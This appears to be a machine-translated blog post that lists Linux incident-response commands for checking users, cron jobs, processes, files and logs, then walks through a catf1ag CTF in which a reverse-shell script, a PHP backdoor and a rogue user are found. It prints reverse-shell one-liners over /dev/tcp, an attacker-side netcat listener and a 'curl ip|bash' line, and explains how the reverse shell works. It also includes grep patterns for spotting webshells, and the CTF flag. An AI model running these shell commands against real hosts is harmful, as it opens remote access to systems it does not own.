Tip: after the article is written, the directory can be generated automatically. Please refer to the help document on the right for how to generate it
preface
Recently, I read more than half of the books on the practical guide to network security emergency response technology (Qianxin). I just encountered the PWN problem of killing on the catf1ag platform. Make a problem-solving record and summarize the killing operation under the linux system.
Tip: the following is the main content of this article
1, Basic skills of emergency response under Linux system
1. System troubleshooting
(1) Basic system information
lscpu see cpu Relevant information, including model, main frequency and kernel uname -a View current operating system information cat /proc/version View operating system version lsmod View all module information loaded into the system
(2) User information
cat /etc/passwd View the user information. Each item is separated by a colon, indicating "user name", "password encryption" and "user" ID""User group ID""Notes user home directory default login shell",bin/bash Indicates that you can log in,sbin/nologin Indicates that you cannot log in awk -F: '{if($3==0)print $1}' /etc/passwd see UID Super user with 0 awk -F: 'length($2)==0 {print $1}' /etc/shadow View air order account lastb View the login list showing user errors lastlog Last login information of all users in the system last User's recent login information( var/log/wtmp|btmp|utmp),wtmp Storage login succeeded, btmp Storage login failed, utmp Currently logging in
(3) Start item
cat /etc/init.d/rc.local see init.d folder rc.local Document content cat /etc/rc.local see rc.local File content ls -alt /etc/init.d see init.d Details of all files under the folder
(4) Task plan
Task plans are generally located in/etc/cron*In such a file crontab -l Current task plan crontab -u username -l View a user's task plan ls /etc/cron* etc All task plan files in the directory There are usually the following folders containing tasks /etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/* /etc/anacrontab
2. Process troubleshooting
(1) Service troubleshooting
netstat Analyze suspicious ports IP,example: netstat -antlp,netstat -ano etc. ls -alt /proc/PID View process ID Corresponding execution procedure lsof -p PID View files opened by the process kill -9 PID Kill someone ID process rm -rf filename Delete a file if root The user can't delete it, and the description file is added i attribute lsattr filename View file properties chattr -i filename To remove a file i attribute ps -ef | awk '{print}' | sort -n |uniq >1,ls /proc | sort -n | uniq>2,diff 1 2,View by hidden processes chkconfig --list View the services running on the system, 0-6 Indicates the level, which are single user mode, multi-user command line mode without network connection, multi-user command line mode with network connection, unavailable, multi-user mode with graphical interface, restart top View processes with high occupancy ps View process information, such as ps -ef etc.
(2) File trace troubleshooting
linux Common sensitive directories are/tmp Directory and command directory/usr/bin,/usr/sbin Often used as malware download directory or replaced directory find Find in the specified directory -type b/d/c/p/l/f Find block device, directory, character device, pipeline, symbolic connection, ordinary file -mtime -n +n Find files by file change time,-n express n Within days,+n express n Days ago -atime -n +n Find files by file access time -ctime -n +n Find files by file creation time stat View the creation time, modification time and access time of the file chkrootkit Check whether there is rootkit Backdoor program, if any infected Description system rear door detected Example: find / -atime 5 -name "*.php"(Find visits in five days.php Suffix file for) find / -ctime 5 -name "*.sh"(New search within five days.sh Suffix file for) find /catalogue -perm 777 View files with 777 permissions stat test.php see test.php File details find / -name "*.php" | xargs egrep "assert|eval|exec|shell_exec|POST" lookup php file,In the content assert,eval Etc ls -alt /bin View the modification time of relevant system commands in the command directory ls -alh /bin Check the size of relevant files to determine whether they are replaced
(3) Log analysis
/var/log/wtmp Record login, entry, exit, data exchange, shutdown and restart /var/log/cron Record log information related to scheduled tasks /var/log/messages Record the information and error log after system startup /var/log/apache2/access.log record Apache Access log /var/log/auth.log Record system authorization information /var/log/secure The account and password entered by most applications of the recorder and whether to log in or not /var/log/faillog Record unsuccessful login information cat /var/log/secure |awk '/Accepted/{print $(NF-3}'|sort|uniq -c|awk '{print $2"="$1;}' (Centos)Positioning how much IP Address brute force cracking root grep "Accepted" /var/log/secure |awk '{print $1,$2,$3,$9,$11}' View the date of successful login,user name,IP address
(5) Flow analysis
Flexible use of Wireshark
2, Detailed explanation of catf1ag# AK PWN
Title Content:
One day, the catf1ag platform received a remote login email. After communicating with the internal partners, it was found that they did not log in, so admin logged in to the server and found that it was invaded and implanted with the files and backdoor files of the regular rebound shell. Please enter the server to simulate and check the problem, find the files of the rebound shell, and find the remote login IP, Find out the connection password of php backdoor file and the new abnormal user.
The topic prompt is obvious. The server uses php to inject the shell back door. Generally, PHP rebound shell operation is
bash -i >& /dev/tcp/ip/port 0>&1
or
Bash - C "bash - I > & / dev / TCP / IP / port 0 > & 1" # bash - I > & / dev / TCP / attacker IP / attacker port 0 > & 1
Complete interpretation:
bash -i# produces a bash interactive environment
>&Combine the contents before and after the union symbol, and then redirect to the latter together.
/dev/tcp/ip/port lets the target host and the attacker IP Port port establishes a tcp connection.
0 > & 1 , combine standard input with standard output, and then redirect to the previous standard output.
Bash generates an interactive environment that combines the connection initiated by the local host and established with the port port port of the attacker (i.e. TCP port session connection), then redirects a TCP port session connection, finally combines the user's keyboard input with the user's standard output, and redirects it to a standard output again, that is, a bash rebound environment is obtained.
On the attacker:
nc -lvvp port
curl ip|bash
Log in to the server using the ssh command
Use the find command to find the PHP file first, find / -name "*.php" |xargs egrep "eval|POST"
Continue to use the find command to find sh suffix file, find / -name "*.sh" |xargs egrep "bash|dev|tcp"
Use cat /etc/passwd to find the user's information and find the hacker_v user
Get the final catf1ag{1.15.155.181-she11.sh-cat_f1ag_666-hacker_v}
summary
Emergency response requires data collection, storage and retrieval capabilities, event discovery capabilities, event analysis capabilities, event research and judgment capabilities, event handling capabilities, and attack traceability capabilities. Make up another wave for the encounter of Window system